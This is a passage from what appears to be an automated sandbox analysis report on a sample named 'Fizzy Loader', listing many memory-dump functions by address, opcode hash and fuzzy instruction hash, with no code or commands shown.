                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 82a94ebab4e7e6bef3f3320e6c34a4a8ee89c4657dd68b9de041eeafd0d85327
                                                                                                                                                            • Instruction ID: 1bfd72d14b3a0cfcfc1f1e268c122377d1fbb4bcc33f3c8d7d028a7fd4d3ae1d
                                                                                                                                                            • Opcode Fuzzy Hash: 82a94ebab4e7e6bef3f3320e6c34a4a8ee89c4657dd68b9de041eeafd0d85327
                                                                                                                                                            • Instruction Fuzzy Hash: 9401D431E0DB850FE78AA77854641707BD1EF56618B2900FBD419CB1E3DA489C068316
                                                                                                                                                            Function 00007FF848F43E80 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8b1ccb34405a1c39d7ef98024f733af361eaa8b6bc6675580a91290699825283
                                                                                                                                                            • Instruction ID: 1ac093324c1b2a91bf33170a1d3592095b9af8ff00d3fd52087a5ca25297668d
                                                                                                                                                            • Opcode Fuzzy Hash: 8b1ccb34405a1c39d7ef98024f733af361eaa8b6bc6675580a91290699825283
                                                                                                                                                            • Instruction Fuzzy Hash: F101F731E1EA0A0EF788F33C5459A752AD1CFA9BD0F08017BD80DDB2E7DE585D89425A
                                                                                                                                                            Function 00007FF848F47388 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 02f8a408da8034b7e6a26c79e6b7fbb46cccc7aa9aaaba8f5a3f259cf73d5abf
                                                                                                                                                            • Instruction ID: 7d4be5b4ca4f02d37820a6e8b58cd78cc265155e5ea62d6b49097901b1782029
                                                                                                                                                            • Opcode Fuzzy Hash: 02f8a408da8034b7e6a26c79e6b7fbb46cccc7aa9aaaba8f5a3f259cf73d5abf
                                                                                                                                                            • Instruction Fuzzy Hash: B901F43290FBD95FE346A7355C5A4E63FB4EF53664B0802EBF084CA0A3E61868068365
                                                                                                                                                            Function 00007FF848F81210 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 75d4cc74cb04bd1d43534091e7019198556e0594afd9cf6b301f641b7f68eafb
                                                                                                                                                            • Instruction ID: 90292000fbebabc3089bb3193f4740944a7023a1f065601d1b72bb07f3b24b96
                                                                                                                                                            • Opcode Fuzzy Hash: 75d4cc74cb04bd1d43534091e7019198556e0594afd9cf6b301f641b7f68eafb
                                                                                                                                                            • Instruction Fuzzy Hash: E0F04F30719E094FD7A4FA6D9884A7272D2FBAC356B10027DD00DC32A6ED26E8428340
                                                                                                                                                            Function 00007FF848F4EAA4 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 552b6261008a8d06e1d6b41a21299981dbbe27a75062fb5fb8d0e485279b2519
                                                                                                                                                            • Instruction ID: f8770450ec4da5898d1cd80d258803ef4ae8608a498b1a75a298f60140d9f6db
                                                                                                                                                            • Opcode Fuzzy Hash: 552b6261008a8d06e1d6b41a21299981dbbe27a75062fb5fb8d0e485279b2519
                                                                                                                                                            • Instruction Fuzzy Hash: 9EF02B3190DA0D5EFB48AB08EC16AF63794FF56234F04003EF48EC1082D761A823C244
                                                                                                                                                            Function 00007FF848F56011 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c652784cd388e3f8316a6a34dba1812f108d84ad791640e7141e85f1d9dd9b56
                                                                                                                                                            • Instruction ID: 5337d9df854408d6cdbef8521074810889e03db4eae3bb591a9f581a9ba5aaef
                                                                                                                                                            • Opcode Fuzzy Hash: c652784cd388e3f8316a6a34dba1812f108d84ad791640e7141e85f1d9dd9b56
                                                                                                                                                            • Instruction Fuzzy Hash: 31F02831A0C7444FD304EB249899566BBE1EBA8390F08477FD408C72F3EB3496404346
                                                                                                                                                            Function 00007FF848F47CBC Relevance: .0, Instructions: 45COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0406257d1849e8b55ab2636a594fc715793c9e843c81e8354a81e420c5e0b518
                                                                                                                                                            • Instruction ID: e8a92da4caa78490b4f734fe2d8a533d3164b7cb17c068d151fd3fb2790a502c
                                                                                                                                                            • Opcode Fuzzy Hash: 0406257d1849e8b55ab2636a594fc715793c9e843c81e8354a81e420c5e0b518
                                                                                                                                                            • Instruction Fuzzy Hash: 4FF08171E1890E5EDB94FBA894561FD7BF1EF58B80F004177E518E2286DE3859054B81
                                                                                                                                                            Function 00007FF848F5062D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 27ee585d5053337a2a85c70018e24979fc62e5460e6ce2bbbd5f90ef00bb561c
                                                                                                                                                            • Instruction ID: fde068339e361d9d74dc398a49ab2e9a41eb2d9b86c899db7ca4ea7a281c1244
                                                                                                                                                            • Opcode Fuzzy Hash: 27ee585d5053337a2a85c70018e24979fc62e5460e6ce2bbbd5f90ef00bb561c
                                                                                                                                                            • Instruction Fuzzy Hash: F501B53290DB460FF325E72498255DABBD1EBD1260F04077AD4958B1E2EE5865098786
                                                                                                                                                            Function 00007FF848F41800 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7047eb6365d61865f542dfd7715457145ce43c0c6f8c4542080bc3b8a3d4b010
                                                                                                                                                            • Instruction ID: b43d0fdf82a7fae1a1c59c436edb5bc0e3c77e61cc1114a70925412b69153fef
                                                                                                                                                            • Opcode Fuzzy Hash: 7047eb6365d61865f542dfd7715457145ce43c0c6f8c4542080bc3b8a3d4b010
                                                                                                                                                            • Instruction Fuzzy Hash: D7F0A43151CB494FD788E708D4545AAB7D1FBE8790F80053EF44AD3395CF2198418786
                                                                                                                                                            Function 00007FF848F62678 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7d911eade2e4402404d34d4aab8cd4bc36621701d384180017be58308274ecc0
                                                                                                                                                            • Instruction ID: 67d92576cb6696a4f164af4bdf72cb22ebad076b7134715aa223dc60c8a2e981
                                                                                                                                                            • Opcode Fuzzy Hash: 7d911eade2e4402404d34d4aab8cd4bc36621701d384180017be58308274ecc0
                                                                                                                                                            • Instruction Fuzzy Hash: ECF0963151CA4C5FD740EB18E40499673E1FBD4315F40067AE84DD72A4DA29D982C7C1
                                                                                                                                                            Function 00007FF848F5F8A0 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 95d2563fa0cd5775a1d60b40dc5d137d3aa4b843235983e5d69ce945ea393365
                                                                                                                                                            • Instruction ID: cf049e751dc5175a43f6b55450602a476803ce433028df379433138a85d66c7a
                                                                                                                                                            • Opcode Fuzzy Hash: 95d2563fa0cd5775a1d60b40dc5d137d3aa4b843235983e5d69ce945ea393365
                                                                                                                                                            • Instruction Fuzzy Hash: 12F08138A1CE1A4FEBA8B7348454772B2E1FB58340F114479D05FC21C4EF28E8868744
                                                                                                                                                            Function 00007FF848F583DE Relevance: .0, Instructions: 42COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7d15746ad3bc1ce25791826a8243f56d5235894c8b6479e563cde82cbbec0566
                                                                                                                                                            • Instruction ID: 94ba90bb255a0797ae5e511b1490c2ea7e493bf778f8e04e8f8e7874d3daaa06
                                                                                                                                                            • Opcode Fuzzy Hash: 7d15746ad3bc1ce25791826a8243f56d5235894c8b6479e563cde82cbbec0566
                                                                                                                                                            • Instruction Fuzzy Hash: 11016D20A1894A4FEBD8FB2884513BA63D2FF98780F644874D41DC32CBDE28E8028351
                                                                                                                                                            Function 00007FF848F51560 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9986d3af82fe1827a26190baf5858b3d57c2a9ada4346138b4dcc78f726d6de6
                                                                                                                                                            • Instruction ID: f3c529ab657e1aaba3fdfae9d979a5ad0edac843caadb41c3174e4b1fe004383
                                                                                                                                                            • Opcode Fuzzy Hash: 9986d3af82fe1827a26190baf5858b3d57c2a9ada4346138b4dcc78f726d6de6
                                                                                                                                                            • Instruction Fuzzy Hash: FFF09C3192CA094EE750FB38940967AF7D0FF8C395F000A3AA89DD21A5EF38E5804785
                                                                                                                                                            Function 00007FF848F56030 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bbb3534618d2b0a9efb443a8a0663fd2f5aa0dcfa742d21cdfdb8f8b676150c5
                                                                                                                                                            • Instruction ID: 40771cb7db3cd35be69e70db8098b179f50f9eeae03ffd183985822a829fd374
                                                                                                                                                            • Opcode Fuzzy Hash: bbb3534618d2b0a9efb443a8a0663fd2f5aa0dcfa742d21cdfdb8f8b676150c5
                                                                                                                                                            • Instruction Fuzzy Hash: FCF0F631608A044FD704F628A889667BBD5D7EC361F14473BE80DC32B5EE3482804386
                                                                                                                                                            Function 00007FF848F5F1C8 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4b8a7563faf155cd8231a32bde73380c61b48840d24f58840abad47b2a24ebc8
                                                                                                                                                            • Instruction ID: e01306e16dac33d10e5b2d1a3a2246481837a14e2a053aea090eb66e3db924a8
                                                                                                                                                            • Opcode Fuzzy Hash: 4b8a7563faf155cd8231a32bde73380c61b48840d24f58840abad47b2a24ebc8
                                                                                                                                                            • Instruction Fuzzy Hash: F0F0EC3090CE181FF398B23C480E53625D4EB69691B10013EF40EC32E3ED506C914294
                                                                                                                                                            Function 00007FF848F5BB70 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 61a5d16fae23101a6299d50e1e8d53ff294678a8f4bae67dc5e7edeefbaf78ef
                                                                                                                                                            • Instruction ID: 3db70821e88a9f7e3554287fc75654e5b06ffaa858068f84b45a851d26f0ad7b
                                                                                                                                                            • Opcode Fuzzy Hash: 61a5d16fae23101a6299d50e1e8d53ff294678a8f4bae67dc5e7edeefbaf78ef
                                                                                                                                                            • Instruction Fuzzy Hash: FCF0BE2085CA660DFFB6727A20483FA69C19B14258F4924BAD889C55C1EE0CFDC58389
                                                                                                                                                            Function 00007FF848F473A0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2c4d7fbc1e84e756b3339866fc01c67f966852162d1642c1110ad9db5c1a32f2
                                                                                                                                                            • Instruction ID: f0522106a9729020dcbecea027a47aa5437e53f378ed28156c9a1c578f3cf804
                                                                                                                                                            • Opcode Fuzzy Hash: 2c4d7fbc1e84e756b3339866fc01c67f966852162d1642c1110ad9db5c1a32f2
                                                                                                                                                            • Instruction Fuzzy Hash: F3F0823180EBD85FD356A7364C5A4A67FB4EE53664B0901DBF084CB0A3E6586C05C371
                                                                                                                                                            Function 00007FF848F54697 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ae7f53f2da8f251bdf06a5ffd958f2df938cd3a37780a22098ef8df020ec76ce
                                                                                                                                                            • Instruction ID: f98faeabb1070aadf2772fc185f085d7d87c413c487e52921f00d8784cc8865b
                                                                                                                                                            • Opcode Fuzzy Hash: ae7f53f2da8f251bdf06a5ffd958f2df938cd3a37780a22098ef8df020ec76ce
                                                                                                                                                            • Instruction Fuzzy Hash: 7CF0A076E0D92B0DFA64B76868022FDF1D1EF956D1F901070D51EC24C3EF0C282B0499
                                                                                                                                                            Function 00007FF848F504B4 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b637a28818a1bc8b587b15afb4c389e1860bc701048aa686fe427acf102b12f8
                                                                                                                                                            • Instruction ID: 33c594a8533c5bf0251d493a081fad2dd43d7cf8df9e37681c5512d8de91c7d0
                                                                                                                                                            • Opcode Fuzzy Hash: b637a28818a1bc8b587b15afb4c389e1860bc701048aa686fe427acf102b12f8
                                                                                                                                                            • Instruction Fuzzy Hash: 7DF07435618A4E8FCF45EF48D8819EAB3A1FFA8301B504666E41AD7285CA34E955CB80
                                                                                                                                                            Function 00007FF848F41A80 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f34db693b226f1735187326e684e74bf28d7b752d50632239858907e9aa5b7af
                                                                                                                                                            • Instruction ID: 70235c911c319ecf261665b20fd8fc58968fe380c27602dbf7c6bc290af1c582
                                                                                                                                                            • Opcode Fuzzy Hash: f34db693b226f1735187326e684e74bf28d7b752d50632239858907e9aa5b7af
                                                                                                                                                            • Instruction Fuzzy Hash: AEE06831D4CB4C4FDB90BB28B8045D83BA0FB85354F04006AE00CC31C1C7205895C342
                                                                                                                                                            Function 00007FF848F5D865 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a3ff72447836b6ffce4f894d5879c2315ede33ed33b85c3570cde0ad4142704e
                                                                                                                                                            • Instruction ID: ee0fd45455d3fe255597890cbceb50fcbc662643d3a2a8afdd12ed49ce1e666d
                                                                                                                                                            • Opcode Fuzzy Hash: a3ff72447836b6ffce4f894d5879c2315ede33ed33b85c3570cde0ad4142704e
                                                                                                                                                            • Instruction Fuzzy Hash: B8F06566A4FDA65FD322A73D64710FABF34EE8622570C02F6C5C806483A759649B8394
                                                                                                                                                            Function 00007FF848F87B20 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1297c79f1d0cf3937386cb3272633bea5691aeae07586990f97f473e0ae72c17
                                                                                                                                                            • Instruction ID: 982d3afb86fd6758cbe7e009b50cd664fd495ebc2cd556165bcf62e0b8558233
                                                                                                                                                            • Opcode Fuzzy Hash: 1297c79f1d0cf3937386cb3272633bea5691aeae07586990f97f473e0ae72c17
                                                                                                                                                            • Instruction Fuzzy Hash: 54E0C230708C0E0F8AA4F31DA844A7532D6EFD832174801B2E40CC3299DF14CC8283C1
                                                                                                                                                            Function 00007FF848F88600 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 393d84c5c486f6dea6c997ba02e240b82982d027696ca6bafa35fa6c2b89cf7c
                                                                                                                                                            • Instruction ID: 4537f5cb2438b5881a48e18c018a83cab4e3f628ed0de1ff406fd7406bf8817d
                                                                                                                                                            • Opcode Fuzzy Hash: 393d84c5c486f6dea6c997ba02e240b82982d027696ca6bafa35fa6c2b89cf7c
                                                                                                                                                            • Instruction Fuzzy Hash: 40E04F31D1CD264DFAB4326824055B41180CF482A8F440072DD2DC61D9EF096EC201CE
                                                                                                                                                            Function 00007FF848F4FB4D Relevance: .0, Instructions: 25COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f28a4dc5881069658a78684c97738c352aaf42f03370f37e4974415d38bb8526
                                                                                                                                                            • Instruction ID: e7d94c6f204f4b0b16eb42fc95fec401b16e78988f0e9f78b677572b82eb3105
                                                                                                                                                            • Opcode Fuzzy Hash: f28a4dc5881069658a78684c97738c352aaf42f03370f37e4974415d38bb8526
                                                                                                                                                            • Instruction Fuzzy Hash: 06E0C221F5A80A4DEB00B374281A1FEB266EFC8254FC00832E90DD21C7CE1C25110185
                                                                                                                                                            Function 00007FF848F40CFD Relevance: .0, Instructions: 25COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 515620f6088f9e60f18c1a1c5fe0f3c9a7098fdd35fc2c93341016ba5435f3d8
                                                                                                                                                            • Instruction ID: 646cc2b2ce8ab75f59016a85adcde762be5764c04d1a74e52737207a5578baf9
                                                                                                                                                            • Opcode Fuzzy Hash: 515620f6088f9e60f18c1a1c5fe0f3c9a7098fdd35fc2c93341016ba5435f3d8
                                                                                                                                                            • Instruction Fuzzy Hash: 2BE0C231F5A80E0DEA80B374281A6FEB266EFC8244FC00832E80DD20C3CE2D24050585
                                                                                                                                                            Function 00007FF848F4E03D Relevance: .0, Instructions: 25COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ecf3e4ee4bc33f096cee017e985a783099a55effeea7d3153757fd7391305340
                                                                                                                                                            • Instruction ID: f485eabb5c83dd4b951262445a1b727e1dd65ceddd76e2281912a16bece3a0df
                                                                                                                                                            • Opcode Fuzzy Hash: ecf3e4ee4bc33f096cee017e985a783099a55effeea7d3153757fd7391305340
                                                                                                                                                            • Instruction Fuzzy Hash: 4DE0C231F5A80A0DEB00B378281A1FEB2A6EF84244FC00832E10DD20C3CF1C24110185
                                                                                                                                                            Function 00007FF848F5A48D Relevance: .0, Instructions: 23COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7a8046e3ea60f20655c5f15b1d0170c67decaa8e46ba1aa8ea310775f5ae195d
